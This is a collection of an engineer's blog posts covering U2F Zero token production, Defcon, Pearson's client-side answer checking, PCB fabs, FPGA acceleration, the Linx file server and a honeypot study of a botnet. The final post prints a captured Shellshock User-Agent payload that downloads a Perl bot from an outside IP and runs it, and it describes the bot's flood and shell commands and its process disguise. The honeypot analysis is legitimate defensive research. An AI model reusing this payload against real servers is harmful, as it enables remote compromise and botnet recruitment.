  • Other discrete components - Button, bypass capacitors, ESD protection, current limiting resistor.

The ATECC508A chip fulfills all security requirements because it has a hardware RNG, write only keys, and hardware acceleration for elliptic curve operations **.

You can see the full source of the design here.

It would be much better with a tamper resistant case or coating, but the initial capital to get that going is currently out of my reach.

Producing it

This is the fun part. I was originally hopeful when starting this project that I would be able to solder everything in one night. But that proved to be too time consuming, messy, and unreliable. So I got it fab'd and assembled at PCBCart. But the real challenge was programming the tokens.

Programming was a challenge because it's dependent on my scripts to handle the initial configuration of the ATECC508A chip and creation of a unique attestation cert for each U2F token. In other words, one binary firmware blob did not cut it. Each token needed to be programmed once to be "customized" and then programmed again with a signed build *. It took me about 1-2 minutes to program a U2F token while prototyping.

Manufacturers like PCBCart typically offer mass programming services, but my process was too complicated and would have ended up being untrustworthy and expensive.

I decided to program everything on my own while promising to my future self that I would make a pipelined process to get everything done affordably and in a reasonable amount of time.


Fast forward a couple months, I have a lot of U2F tokens from PCBCart:

I automated and optimized my programming setup. I acquired 3 programmers, 3 USB extension cables, and made 3 connectors using protoboard and machine pins.

How it would work:

  1. I plug in a U2F token to a USB cable for power and plug in a programmer.
  2. I press a button on my keyboard to start programming from that programmer.
  3. The script flashes a setup firmware with a unique serial number so the token can be communicated with in parallel with other tokens.
  4. The configuration and signing occurs.
  5. A final program is built and programmed.
  6. The token is told to blink green and blue so I can see that it is done.

This process takes about 10 seconds per token. Because I had three setups, I could get up to three working at the same time. It would have been quicker with 4 or 5, but eventually I wouldn't be able to plug them in fast enough to get more than 5 programming at the same time.

It took me about 4 hours total to get through everything. I watched two movies (props if you can figure out which ones). Occasionally my pipeline would stall on some edge cases and I would have to restart but it was mostly smooth. I only had 1 token from PCBCart that didn't work (which is okay since PCBCart made a couple extras).

Fulfillment by Amazon

My goal was to have U2F Zero listed in stock for at least a year. I don't know how many I can expect to sell so it's a bit of a shot in the dark. I know I don't want to be bothered handling payments and shipping, so I needed a distributor. I decided to go with Amazon because they make it so easy for most people to order things online (and free shipping).

Listing a product on Amazon is very easy if it's already listed. You just pick the already listed product and reuse all of the information already there.

But if you're adding a new product, you have to consider a couple options:

  1. New Brand Owner: If you own the brand of a product not currently on Amazon, you must apply for Amazon to approve your brand and then list the product.
  2. New product but not brand owner: If you want to list a product but you do not own the brand for it, you need to get permission from the brand owner to sell it and then Amazon will allow you to list the product.

Because I was the owner of the brand (I called it U2F Zero), I attempted option (1). However, unmentioned in their documentation, Amazon requires that the brand be printed directly on the packaging to protect the brand. Stickers or labels do not count. All I had and had planned to use was polybags and labels.

I didn't want to back up and get everything repackaged with my "brand" printed on it. I decided that the owner of the U2F Zero "business" would be my LLC -- ConorCo.

I wrote a letter to ConorCo LLC and asked for permission to sell their product, U2F Zero, on Amazon. The majority shareholder of ConorCo LLC, Conor Patrick, promptly signed off to give me permission to do that. I then submitted this to Amazon, in compliance with option (2). Amazon promptly accepted the application and listed U2F Zero.

After a polybag and labeler packaging party with help from my roommates, U2F Zero is available on Amazon.

Fortunately I had "U2F Zero" printed on the PCB before I even knew that I needed to. Amazon may not have accepted it otherwise. The domain u2fzero.com points to a launch page required for the Amazon application.

Some costs

Including all parts, PCBs, and assembly, each token costs about $3.40 to make. This is cheaper than making just 1 token because costs go down when purchasing large volumes.

There's also the cost of prototyping, buying new tools, and frictional costs. For example, I got hit with a $126 tariff when importing the assembled boards from China. I also have some extra tokens not being sold to use for replacements. I estimate the real cost was actually about $4.18 per token.

Amazon takes about $2 out of each sale. How much Amazon takes depends on the product. U2F Zero qualifies for Amazon's Small and Light fulfillment program which has the smallest fees.

If I sell out at $8 per token, I would make a 43% ROI. That's optimistic though. I may have to drop the price later on if needed. The break even price would be around $6.20. I don't know what to expect. I'll make a post about this later on.
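The figures above can be checked with a few lines of C. This is only a sketch of the arithmetic: the $2 Amazon cut is treated as a flat per-sale fee (the post only says "about $2"), and the function and macro names are made up for illustration.

```c
/* Per-token figures from the post, in US dollars. */
#define UNIT_COST   4.18   /* estimated real cost per token */
#define AMAZON_FEE  2.00   /* approximate Amazon cut per sale (assumed flat) */

/* Return on investment, in percent, at a given sale price. */
static double roi_percent(double price) {
    double profit = price - AMAZON_FEE - UNIT_COST;
    return 100.0 * profit / UNIT_COST;
}

/* Sale price at which the profit per token is zero. */
static double break_even_price(void) {
    return UNIT_COST + AMAZON_FEE;
}
```

At $8, `roi_percent(8.0)` comes out at roughly 43.5%, and `break_even_price()` gives $6.18, which rounds to the "around $6.20" quoted above.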

Wrap up

I'm by no means an entrepreneur but I'd like to keep trying to be one. This project has been a long term experiment and the experience has been great for me. I am not actually concerned with financial success or growth. The nice thing about this project is I can just let it sit and I don't need to maintain anything -- leaving me time to move on to the next project.

Feel free to make your own U2F Zero or mass produce it. Maybe you can figure out how to produce them cheaper than what I could.

* Calling something secure isn't simple. Here's a better analysis.
** Finding a chip that has secure public key crypto (P-256) implementations is non-trivial. I got lucky when I found Atmel's chip which was easy to purchase and get documentation for. Other manufacturers that offer potential secure chips are NXP, STMicroelectronics, and Infineon. But none of them sell their secure chipsets through normal distributors, and they seem to require customers to go through NDAs, licensing, and large minimum order requirements. I hope the market for public key hardware becomes more transparent.
* The public key in the build is signed for device attestation.
/

My experience going to Defcon and SAC

I just attended Defcon 24 in Las Vegas and went to SAC (Selected Areas in Cryptography) afterwards.

Defcon

Defcon is a great conference that hosts around 15k people every year. People come to share their new research in infosec and exploits that they have developed over the past year. Some people come to partake in the various competitions like the badge puzzle. And of course there are the parties that various vendors and groups throw.

I got to LV a day early so I could attend the unofficial Defcon Shoot. It's where a bunch of people bring guns to go shoot in the desert. I didn't have anything to bring but most people are nice and let you shoot their weapons for the cost of ammo. I got to put 100 rounds through an M60:

The Villages

In addition to the official talk tracks put on by Defcon, there are the villages. The villages are separate groups that focus on more specific parts of security. Each village typically hosts their own set of talks or competitions.
To list the different Villages from this year:

  • Bio Hacking
  • Car Hacking
  • Crypto and Privacy
  • Hardware Hacking
  • IoT
  • Lockpicking
  • Packet Hacking
  • Social Engineering
  • Tamper Evident

I spent a lot of time in the Crypto and Privacy Village this year as they often have talks I'm interested in. I also learned a little bit about getting past tamper evident envelopes and tape at the Tamper Evident Village which was fun.

One of my friends went to the Bio Hacking Village and got an NFC chip inserted into his hand:

It's supposed to last for life (or until you remove it surgically). We of course first programmed it with this link to pop up on anyone's phone that read his hand.

But my favorite part about Defcon is getting to meet new people and catch up with old friends.

I met the folks behind AND!XOR and learned about their creation of the Bender Badge:

Bender

I only went to like one or two of the talks. I think at a conference like this, most of the fun and memorable things will happen outside of the talks.

There was a Cyber Grand Challenge sponsored by DARPA. The challenge was to make the best automated computer system that would find and patch bugs in software. They had teams from different universities competing for millions of dollars. The competition was narrated and animated to give it an eSport feel. It was really cool, but ultimately it gets boring to watch computer programs run (really fast) despite all of the animations.

Then each night there are a lot of parties. Each is hosted by companies or other groups that are popular at Defcon. Some of the parties are awesome; but a lot of them I think are bad because it's either really long lines or just a bunch of fellow nerds trying to dance.

The lines really put me off. If there's a long wait then don't bother waiting. There's this norm where the hosts will keep the lines long even when there's plenty of room inside. I guess it helps make the party seem better than what it really is.

I get that there isn't enough room for everyone, but some groups I think do it better. For example, the Telephreak group held an invite only event for well known hackers and left open challenges that skillful people at the conference could solve. If you could solve it, then you could get an invite. Unfortunately I flew out of LV before the Telephreak party otherwise I would have tried to solve one of their challenges.

There's so much going on at Defcon that you can't possibly participate in everything. But it's great and I'll be going next year.

Selected Areas in Cryptography (SAC)

This was purely an academic conference that focuses on, well, selected areas in cryptography. The research group I work in at Virginia Tech did a lot of work in fault attacks and countermeasures. SAC had a special focus this year on fault attacks and side channel analysis. So we submitted a paper and I traveled to present it.

If you're interested, check out my advisor's post for an overview of our work.

This was my first time at an academic conference and my first time presenting at any conference. It was pretty laid back. There were around 100 attendees from around the world and about 30 speakers. I suppose that's what to expect from small conferences.

It was an awesome experience for me to get to meet other researchers in the field and see people that are on papers I've previously studied. I got to meet other graduate students that know a lot about crypto.

It's pretty motivating to come back from a conference so related to your research and meet like minded people. I feel like I think of a lot more ideas of things to work on coming back to the lab. As Francesco Regazzoni put it (paraphrasing), "For the students here, there's one thing you should get from a conference like this, and that's a big idea. By the end of this, you should feel like there's a big problem you want to be working on."

Newfoundland

SAC was held in St. John's in Newfoundland, Canada. Fortunately the weather was still good and the area was really nice.

I hiked Signal Hill, which was the first place to receive a transatlantic wireless signal.

Signal Hill

The conference also hosted a puffin and whale watching tour. I never thought myself to be much of a whale watcher but this was actually really cool (even though we saw no whales). Turns out there's this island off the coast that most of the puffin population relies on to lay their eggs for various ecological reasons. And they were all there because it was the egg laying time of the year. It was surprising to see thousands of puffins all flying around you at once. We were told to not look up with our mouths open. Unfortunately my camera was dead and I couldn't get a picture.

On the last day, me and a couple friends I met went to a small town called Quidi Vidi to try out the brewery there. They make a lager called Iceberg Beer from the water of melted icebergs. It was pretty good!

At the brewery, I think me and the other grad students stuck out: none of us were from Canada and most of the crowd was older. One lady even tried calling me out for not being old enough to drink (in good fun). All of the locals were very nice. One local sat down with us and exchanged stories. He even offered to take us fishing!

There's this tradition in Newfoundland for newcomers to drink a shot of Newfoundland Screech Rum and then kiss a cod. Some of the bars will let you honor this tradition but I forgot to ask. I did get a chance to drink the rum (which was good). Next time I go down I will try to kiss the cod.

/

Pearson Education's client side method for checking homework answers

Exploitable Method

By exploitable, I don't mean in the traditional security sense. I mean exploitable by lazy undergraduate students.

Pearson Education runs a large set of web applications that colleges use to automate their tedious ABET required courses. I was stuck in one my senior year and noticed that they check homework answers client side.

Pearson's physics web application (Mastering Physics) used to be "exploited" via a small bit of JavaScript that would expose the homework answers loaded client side. It has long been fixed. As I'll show you in this post, homework answers are still checked client side. They just obfuscated it further.

Disclaimer: I don't like cheating. I'm not providing a means for others to cheat.

Obfuscated client side checking

For the class I was in, the homework was run in a bloated Flash application.

I considered looking at how the applet worked using a decompiler or debugger but quickly realized how big of a pain it would have been as the applet is over 1 MB. Instead, I looked at other files the applet uses.

If you open Chrome's network tab in the developer tools, you can see all of the resources that the Flash applet loads. Looking at the other resources downloaded, one file called "I0604041.Ipx" stood out. It can be downloaded without any authentication, so feel free to follow along:

curl -o hw.ipx 'https://www.mathxl.com/books/sullee16/Ipx/c6/I0604041.Ipx'

After a quick inspection, one can see that it is just a zip file. Let's see what's inside.

unzip hw.ipx

Unzipping reveals two XML files: _manifest.xml and 14037884_006!Sullivan15e.6.4.5.tdxex. At this point a lazy student would be hoping to find the answers enumerated in one of the files. But it's not that simple.

_manifest.xml just contains some irrelevant metadata. The other file is quite large (~1420 lines of XML) and details the layout and problems for the homework. Nowhere in it are the "answers".

Let's look closer and try to figure out how it's used by the Flash applet. Here is a snippet from the large XML file:

<text>The PW of the difference between the old and new systems is $</text>
<control br="0" vshiftabs="1" spacing="1" textstyle="Normal" data="">S1</control>

It is a homework problem that asks for the PW of the difference between two systems. It would normally be displayed in the Flash applet. After the "$" is a spot for the student to enter an answer. But in the XML we see a "control" tag instead that wraps a value called S1.

If we search the XML for other references to S1, we see something that looks like a definition:

<field name="S1" format="" tol="5" acceptunformattedvalues="1" rule="numeric">
  <solution>
    <expr>~dpw</expr>
  </solution>

Here S1 gets defined as ~dpw. Okay. Let's continue down the rabbit hole and see if we can find a definition for ~dpw.

<var name="dpw" type="int" format=",">
  <constraint>
    <incl>
      <expr>-~dcost+~dlc*((((1+0.01*~p)^60)-1)/(0.01*~p*(1+0.01*~p)^60))+~dmv/((1+0.01*~p)^60)</expr>
    </incl>
  </constraint>
</var>

It looks like the definition for dpw is a non-trivial equation that contains references to other variables like dcost, dlc, and p. But the equation looks suspiciously like the work needed to be done to honestly solve the problem about "PW system differences".
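As a sketch of what solving this node by hand amounts to, here is the expression transcribed into C. The variable names come from the XML; treating `p` as a percentage rate per period and 60 as the number of periods is my reading of the formula, not something the file states, and the helper `growth` is a made-up name that avoids needing the math library.

```c
/* (1 + i)^n for a non-negative integer n, by repeated multiplication. */
static double growth(double i, unsigned n) {
    double g = 1.0;
    while (n--)
        g *= 1.0 + i;
    return g;
}

/* Direct transcription of the <expr> for dpw. The 60 is hard-coded in
 * the XML expression. p must be non-zero or the middle term divides by 0. */
static double dpw(double dcost, double dlc, double dmv, double p) {
    double i = 0.01 * p;          /* 0.01*~p         */
    double g = growth(i, 60);     /* (1+0.01*~p)^60  */
    return -dcost + dlc * ((g - 1.0) / (i * g)) + dmv / g;
}
```

The inputs `dcost`, `dlc`, `dmv`, and `p` would themselves have to be resolved from their own definitions elsewhere in the file before this could be evaluated.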

At this point I made a pretty confident hypothesis of how the flash application works. It reads this XML file to generate the markup for all the homework problems. It then recursively follows this definition tree to figure out what the answers are. It also is calculating the answers on the fly, meaning no free lunch for the lazy student. After solving the homework problem the honest way, I manually solved the tree of definitions and found the correct answer, which confirmed my hypothesis.

Assuming that most of Pearson's online classes use the same functionality, Pearson is clearly checking homework answers client side, which can always be exploited.

In this case, recursing through the XML file by hand would be more work than just doing the homework. Alternatively, someone could write a program to automate it, but who knows how much work that would be, as it would be equivalent to rewriting Pearson's Flash applet.

Should Pearson change anything?

Of course, this can be solved by server side checking. But I feel it's not really necessary. The Flash applet is hard enough for the average student to cheat. And in the end, cheating students only cheat themselves.

/

My experience with DirtyPCBS.com

Dirty Cheap Dirty Boards

If you want to order custom made PCBs for a small price, Dirty PCB's is probably your cheapest option. This used to be an internal service at Dangerous Prototypes for making cheap boards for their own projects. Now it's public and they make dirty cheap boards for anyone.

To get an idea, you can buy ~10 boards that are 5x5 cm for $14 (free shipping). You can get more boards, larger sizes, and more layers as well for relatively cheap prices.

Here I'll share my experience with Dirty PCB's and photos of a U2F 2FA token I've been working on. I ordered the same boards from Seeed Studio as well to compare.

The revisions

This is my first PCB so the first one is pretty dirty by design and not just because of Dirty PCB's. The next revision is a better layout.

Revision 1 from Dirty PCB's

R1 Dirty PCB's front

R1 Dirty PCB's back

Revision 1 from Seeed Studio

R1 Seeed Studio front

R1 Seeed Studio back

You can see that the layout is pretty poor. None of the traces really make 45 degree angles or care about what angle they cross over each other between layers.

Also there is no ground plane. I don't really need one but decided to add one later.

There isn't too much of a difference in quality between the two boards. But you can still see why Dirty PCB's is cheap:

  • The silkscreen (white coloring) is smudgy and doesn't have as good of a tolerance.
  • The solder mask is not as well aligned with the pins. Look at where the red/green covering meets the pins.
  • The vias are bigger and make some of the pins look smudged.

Look at both board pictures in new tabs and you can see these differences in quality for yourself.

At the time Seeed was a little more expensive ($10 for 10 boards + $10 shipping) and charged more for 2mm thick boards, which I need because they fit best in a USB socket. Now it seems their pricing is similar to Dirty PCB's.

After revising my layout design, I made two more orders from Dirty PCB's.

Revision 2 Dirty PCB's

R2 back

R2 back

I'm not sure what happened to the silkscreen on this one. It seems any traces or ground plane overlapped the silkscreen. I suspect it was an issue at the board house since the next revision (which is really the same layout, just a different color) did not suffer this problem.

Revision 3 Dirty PCB's

R3 back

R3 back

Where to get PCB's

Overall, small PCBs are pretty cheap. I think Seeed will offer slightly higher quality for a similar price. Dirty PCB's will charge less for other options like color and stencils and will be quicker out of the board house.

If your PCB design isn't crazy on tolerances, you can't go wrong with either one.

Update

Based on replies I've gotten, here are some other places to check out for maxing out cheapness and quality:

Check out PCBshopper.com to query the price of most fabs for a given board.

/

How to accelerate a program using hardware

The Challenge

One of my recent final projects in school was to take a given software program and make it as fast as possible while still being functionally correct. It was graded based on speed and how it ranked against each solution in the class.

Here I will show you how to incrementally find bottlenecks in software and replace them with hardware components.

The Specification

For those not familiar with what a field-programmable gate array (FPGA) is, it's a chip made up of various programmable memories, logic cells, lookup tables, and interconnect that can be configured to be functionally equivalent to nearly any digital design that will fit on it.

I could make a MIPS processor connected to a custom accelerated HDMI controller. Then I could reprogram it to be a simple counter circuit. This is quite useful for digital design.

For the challenge to be fair, it had to run on an Altera Cyclone IV FPGA. It had to be timed with a 50 MHz timer (also configured onto the FPGA) to get a consistent benchmark. And it had to be functionally correct. That's it.

The Program

We had to implement a program that could draw 50 randomly generated circles on a shared memory. We were given a reference C design that ran on a RISC 32 bit processor. It completes in 14,892,988 cycles.

Here is the reference function for drawing one circle. Don't try to understand the functionality; try to find areas where the processor would spend most of its time (bottlenecks).

// This is called 50 times
void plotcircle(unsigned cx, unsigned cy, unsigned r) {
    int x, y;
    int xp;
    x   = r;
    y   = 0;
    xp  = 1 - (int) r;
    while (x >= y) {
        setpixel(cx + x, cy + y);
        setpixel(cx + x, cy - y);
        setpixel(cx - x, cy + y);
        setpixel(cx - x, cy - y);
        setpixel(cx + y, cy + x);
        setpixel(cx + y, cy - x);
        setpixel(cx - y, cy + x);
        setpixel(cx - y, cy - x);
        y   = y + 1;
        if (xp < 0)
            xp += (2*y + 1);
        else {
            x = x - 1;
            xp += 2*(y-x) + 1;
        }
    }
}

This reference implements the Bresenham circle drawing algorithm [PDF].

Since we can accelerate using hardware, here is a diagram of the reference architecture.

A simple processor runs the C code and connects to program memory (for .bss, .text, stack, etc.) and a separate memory for drawing the circles. It runs on a 50 MHz clock and is timed by a 50 MHz timer.

Accelerating

Do you have any ideas? Here is what I thought of.

setpixel(...)

My first thought was that a bottleneck would be in the setpixel(...) function. It's called eight times for each iteration of the loop. And don't forget to multiply that by 50 because there are 50 circles to plot. So perhaps by accelerating this small part of the design we could get a large speedup.

So let's see how we can call this function only once per iteration of the loop. We can write a small coprocessor in Verilog to do these 8 writes really fast and in parallel with this calculation:

y   = y + 1;
if (xp < 0)
    xp += (2*y + 1);
else {
    x = x - 1;
    xp += 2*(y-x) + 1;
}

Since the coprocessor is in hardware, it can easily do the cx+x, cy+y, cy - y, ... calculations simultaneously and fast enough to get 8 writes in 8 clock cycles.
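As a rough software model of that step (not the author's Verilog), the function below produces the eight symmetric points for one (x, y) pair, in the same order as the eight setpixel calls in the reference code. The `struct point` type and the function name are made up for this sketch; in hardware the eight additions and subtractions are separate circuits working at the same time rather than sequential statements.

```c
/* One pixel coordinate. */
struct point { unsigned x, y; };

/* Software model of what the coprocessor computes for one (x, y) pair:
 * the eight symmetric points of the circle centered at (cx, cy). */
static void octant_points(unsigned cx, unsigned cy, unsigned x, unsigned y,
                          struct point out[8]) {
    out[0] = (struct point){ cx + x, cy + y };
    out[1] = (struct point){ cx + x, cy - y };
    out[2] = (struct point){ cx - x, cy + y };
    out[3] = (struct point){ cx - x, cy - y };
    out[4] = (struct point){ cx + y, cy + x };
    out[5] = (struct point){ cx + y, cy - x };
    out[6] = (struct point){ cx - y, cy + x };
    out[7] = (struct point){ cx - y, cy - x };
}
```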

Now here is the new architecture:

The coprocessor sits between the memory and the main processor transparently and acts just like a memory as far as the main processor can tell. But the coprocessor is doing 8 writes to the pixel memory for each write from the main processor to achieve the acceleration. If you're interested, here is semi-correct Verilog I pulled from my git history.

Here is the new C code to interface with the coprocessor:

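// Macro arguments are parenthesized so expressions can be passed safely.
#define SET_RADIUS(cx,cy,r) (*(volatile unsigned *) PIX_MEM = (((r)<<18)|((cy)<<9)|(cx)))
// Assumes PIX_MEM is an integer byte address and the second register sits 4 bytes above it.
#define SET_PIXELS(x,y) (*(volatile unsigned *) (PIX_MEM+4) = (((y)<<9)|(x)))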

// called 50 times
void plotcircle_hw(int circle, unsigned cx, unsigned cy, unsigned r) {
    int x, y;
    int xp;
    SET_RADIUS(cx,cy,r);
    x   = r;
    y   = 0;
    xp  = 1 - (int) r;
    while (x >= y) {
        SET_PIXELS(x,y);    // acceleration
        y   = y + 1;
        if (xp < 0)
            xp += (2*y + 1);
        else {
            x = x - 1;
            xp += 2*(y-x) + 1;
        }
    }
}

The coprocessor is mapped to the location defined by PIX_MEM, so that is where the program writes. The design is now doing only 1 write (SET_PIXELS) and 16 fewer arithmetic calculations per iteration of the loop. After running the new design, I found there is about a 40x speedup over the reference. Awesome. Now how can we make it faster?

Drawing Circles in Parallel

Despite the 40x speedup, it is still drawing 50 circles sequentially. If it could draw all of them at the same time, then it could ideally expect a 50 × 40 = 2000x speedup, right? But this can be difficult because it's writing to a shared memory. It can't do 50 writes at the same time to one memory.

As far as I know, 50-port memories cannot be synthesized for the FPGA. But we can write to 50 different memories at the same time! It's space intensive, but we are designing purely for speed.

The idea here is we can make an individual memory for each circle to be plotted on. And when reads occur, the coprocessor will read from all memories simultaneously and OR them together.

That way, the main processor still thinks it's a regular memory with 50 circles plotted on it.
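A small software model may help picture the read path. This is a sketch under assumptions, not the actual Verilog: it assumes one bit per pixel packed into 32-bit words, a made-up memory size, and hypothetical function names. The count of 12 memories is the number that ended up fitting on the board.

```c
#include <assert.h>
#include <stdint.h>

#define NUM_PLANES  12  /* one memory per circle being drawn in parallel */
#define PLANE_WORDS 64  /* hypothetical size, kept small for the sketch */

/* Each circle gets its own private memory to write into. */
static uint32_t planes[NUM_PLANES][PLANE_WORDS];

/* A circle engine sets pixel bits only in its own memory. */
void plane_write(unsigned plane, unsigned addr, uint32_t bits)
{
    assert(plane < NUM_PLANES && addr < PLANE_WORDS);
    planes[plane][addr] |= bits;
}

/* A read from the main processor sees the OR of all memories. */
uint32_t combined_read(unsigned addr)
{
    assert(addr < PLANE_WORDS);
    uint32_t word = 0;
    for (unsigned p = 0; p < NUM_PLANES; p++)
        word |= planes[p][addr];
    return word;
}
```

In hardware the loop in combined_read is a single wide OR gate, so the read costs no more time than a read from one memory.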

Here is the new architecture (and coprocessor verilog for those that are interested):

Note that this design also implements the rest of the circle drawing algorithm in hardware. All it needs is the center point and radius to start drawing a circle. Here is the small amount of new C code:

#define SET_RADIUS(c,x,y,r) (*(volatile unsigned *) PIX_MEM = ((c<<26)|(r<<18)|(y<<9)|x))

// called 50 times
void plotcircle_hw(int circle_index, unsigned cx, unsigned cy, unsigned r) {
        SET_RADIUS(circle_index,cx,cy,r);
}

It writes the circle index (1 to 50), center point, and radius to the memory-mapped coprocessor.
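The bit layout of that command word can be read off the shifts in SET_RADIUS. Here is a sketch of packing and unpacking it, assuming a 32-bit word and non-overlapping fields (9 bits each for x and y, 8 bits for the radius, 6 bits for the circle index). The field widths are inferred from the shift amounts, and the struct and function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Field layout inferred from the SET_RADIUS shifts:
 *   bits 0-8: x, bits 9-17: y, bits 18-25: r, bits 26-31: circle index */
struct circle_cmd { unsigned c, x, y, r; };

/* Builds the word that the C code writes to the coprocessor. */
uint32_t pack_circle(struct circle_cmd cmd)
{
    assert(cmd.x < 512 && cmd.y < 512);
    assert(cmd.r < 256 && cmd.c < 64);
    return ((uint32_t)cmd.c << 26) | ((uint32_t)cmd.r << 18) |
           ((uint32_t)cmd.y << 9)  |  (uint32_t)cmd.x;
}

/* Recovers the fields, as the hardware side would have to. */
struct circle_cmd unpack_circle(uint32_t word)
{
    struct circle_cmd cmd;
    cmd.x = word & 0x1FF;
    cmd.y = (word >> 9) & 0x1FF;
    cmd.r = (word >> 18) & 0xFF;
    cmd.c = (word >> 26) & 0x3F;
    return cmd;
}
```

The asserts in pack_circle catch a value that would spill into a neighboring field, which the bare macro silently allows.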

Now what is the speedup?

Unfortunately this does not yield the ideal extra 50x speedup. First off, there wasn't enough room on the board for 50 individual memories - there was only room for 12.

Second, after calling plotcircle_hw(...) 50 times, we need a small delay. This is to wait for the hardware processors to finish plotting.

After testing for correctness, the design achieves a 600x total speedup! That's pretty sweet, but there's still a lot more we can do!

Read from program memory in hardware

Let's take a look at the current system for the bottleneck. What is the main processor doing? It's calling SET_RADIUS(...) 50 times. That's 50 writes, each with an assortment of shifts and ORs to put the arguments into a word.

#define SET_RADIUS(c,x,y,r) (*(volatile unsigned *) PIX_MEM = ((c<<26)|(r<<18)|(y<<9)|x))

We can do this in hardware instead. Let's add a dual port on the program memory to give the coprocessor direct access to it. Also, since we're delaying for the hardware modules to finish, let's increase their clock inputs to 100 MHz!

Coprocessor verilog

Now here is the minimal C code:

#define PIX_BUSY (*(volatile unsigned *)((PIX_MEM)+4))
#define PIX_WSTART (*(volatile unsigned *)PIX_MEM)

// called once
void plotallcircles_hw() {
    PIX_WSTART = (unsigned)stack_address_of_global_circle_data_array;
    while(PIX_BUSY);
}

It writes the stack address where the generated circle coordinates and radii are located. Now the coprocessor will do the reads on its own. The C program reads from PIX_BUSY, which is a control signal that indicates when all circles have finished plotting. Also note that the function is only called once instead of 50 times.

The speedup was now about 5000x over the reference design.

In the reference, it did 8 writes and about 20-24 arithmetic instructions for each iteration of a loop that varied between 0-202 iterations. It did all of that 50 times.

Now in the fully accelerated design, it just does one write and polls the hardware until it's done. The 5000x speedup is expected.

Conclusion

Hardware acceleration is an iterative process and warrants a good understanding of the overall architecture and its bottlenecks. Plus it's not always required to get as much speed as possible. The final design here would be expensive to implement in practice. It could be acceptable to stop at any of the iterations above for many projects.

This was a fun project, and improving the performance of a program is a satisfying experience. If you have any ideas for how to make it even faster, be sure to let me know.

Thanks to Dr. Schaumont for an awesome class and project. Check out the results and details of the project, as well as past years.


Linx: the filesharing server every hacker should know about

Linx

Many file sharing servers already exist; a lot of them come and go. Services like Google Drive and Dropbox are the big ones. There are also more lightweight options like pastebin or python -m SimpleHTTPServer.

Linx is a recent, open source file sharing server that I've started using. It makes it easy to share files or quickly written scripts without tying them to any public account. It's also nice if I'm hacking on a project and don't want to deal with setting up large web-scale file storage accounts or APIs (AWS, Firebase, etc.).

So Linx really sticks out for the following reasons:

  • It's written in Go (which seems to be a plus these days).
  • Has a built in API that is as simple as a file sharing API should be.
  • It supports displaying common file types with proper syntax highlighting if needed:
    • jpg, pdf, txt, c, python, shell, contents of compressed files, etc.
  • No user accounts or bullshit. Basic anonymity is attained with randomized filenames and file expirations.
  • It's open source and was designed for other people to run.

Setting up your own Linx server

Right now I'm running my own Linx server on one of my Digital Ocean instances.

It was pretty easy to set up since there are builds for all major platforms (except mobile). It has all the configuration details I care about and nothing more. For my setup, I have it sitting behind my Nginx server with FastCGI and HTTPS.

Easiest way to set up (64-bit Linux):

wget https://github.com/andreimarcu/linx-server/releases/download/v1.1.4/linx-server-v1.1.4_linux-amd64
chmod +x linx-server-v1.1.4_linux-amd64
./linx-server-v1.1.4_linux-amd64

You should pick out the build for your system and try it out. If you're setting up your own Linx server for real, make sure you cover a couple of configuration options:

./linx-server -bind 0.0.0.0:8080 \
  -siteurl "http://0x123.xyz/" \
  -remoteuploads \
  -maxsize 1048576

If you want Linx to be public, you should tell it to bind to 0.0.0.0. It's also very important to let Linx know the siteurl - not only so Linx can correctly generate links, but also to prevent hotlinking by checking the origin or referer.

Hotlinking is sometimes a serious problem that small services face. As we can see from The Oatmeal, it can seriously increase server bills.

seriously increase server bills

Wouldn't have been a problem if the image was hosted with Linx!
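For readers unfamiliar with referer checking, here is a rough sketch of the idea in C. This is not Linx's code (Linx is written in Go). The function name and the policy of letting requests with no Referer through are assumptions made for illustration.

```c
#include <assert.h>
#include <string.h>

/*
 * Returns 1 if a request should be served, 0 if it looks like a hotlink.
 * Hypothetical policy: a missing or empty Referer is allowed (direct
 * visits, curl), otherwise the Referer must start with the site URL.
 */
int referer_allowed(const char *siteurl, const char *referer)
{
    assert(siteurl != 0);
    if (referer == 0 || referer[0] == '\0')
        return 1;
    return strncmp(referer, siteurl, strlen(siteurl)) == 0;
}
```

With the siteurl from the example above, a request whose Referer is a page on another domain would be rejected, while one coming from http://0x123.xyz/ itself would be served.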

More features of Linx:

  • Built in https/TLS server
  • API key authentication and generation
  • Content security policies
  • HTTP proxy support
  • Torrenting support

Demo

Check out linx.li!

Conclusion

Linx has everything I want from a file sharing server. If there's something that's missing, you should contribute.


A close look at an operating botnet

For those that don't know, a botnet is a network of hacked computers that somehow connect back to a command and control server which instructs the network to conduct malicious activities like DDOS attacks, phishing, or spam.

What happened

This past summer, I decided to set up a honey pot server. I hadn't done something like that before and I was curious to see what would show up.

I set up a fresh Digital Ocean instance and installed a vulnerability that could be remotely exploited. I chose to use the Shellshock bug and installed an older version of Bash. Shellshock was a vulnerability in Bash that would execute code appended to a function definition stored in an environment variable. This can easily be exploited remotely because of how CGI web servers pass arguments through environment variables.

After installing Bash 4.2, I set up an Apache web server to serve CGI, so that common URLs and 404s would all map to one simple, Shellshock-vulnerable script:

#!/bin/bash
echo -e "Content-type:text/html\r\n\r\n"
echo "Hi $HTTP_USER_AGENT"

Functionally the script just returns a text page saying hi to whatever the user agent string was. But if an HTTP request were to look something like this:

GET /hello HTTP/1.1
Host:        104.131.107.238
User-Agent:  () { :;}; /bin/bash -c "cd /tmp;lwp-download -a http://23.229.121.189/ex;curl -O http://23.229.121.189/ex;wget http://23.229.121.189/ex;perl /tmp/ex*;perl ex;rm -rf /tmp/ex*"

Then Bash 4.2 will execute the code in the User-Agent string, which downloads a Perl script, ex, and runs it.
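The payload is easy to recognize because the header value begins with the "() {" function-definition prefix. Here is a minimal sketch of a check for that signature in C. The function name is hypothetical, and this is only a detection heuristic for logging or filtering; the real fix is a patched Bash.

```c
#include <assert.h>
#include <string.h>

/*
 * Returns 1 if a header value starts with the "() {" prefix that
 * Shellshock payloads use, after skipping leading spaces or tabs.
 */
int looks_like_shellshock(const char *value)
{
    assert(value != 0);
    while (*value == ' ' || *value == '\t')
        value++;
    return strncmp(value, "() {", 4) == 0;
}
```

Run against the User-Agent in the request above, this returns 1. A normal browser string such as "Mozilla/5.0 (X11; Linux x86_64)" returns 0.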

After leaving the server running for a couple of months, that is exactly what happened.

Analysis

To summarize the Perl script, it's about 500 lines, connects to a server, wileful.com, and listens for commands. Some of the commands it looks for include tcpflood, eval, and shell. This looks like functionality for a botnet bot.

It also implements some stealth. Upon running the program, it immediately forks a /usr/sbin/httpd process, overwrites it with the Perl process using exec, and detaches from the parent process so it can run independently in the background.

So you won't be able to see a new perl process running. Instead, a new /usr/sbin/httpd process will be running.

root@b0b6000146fa:~# perl ex
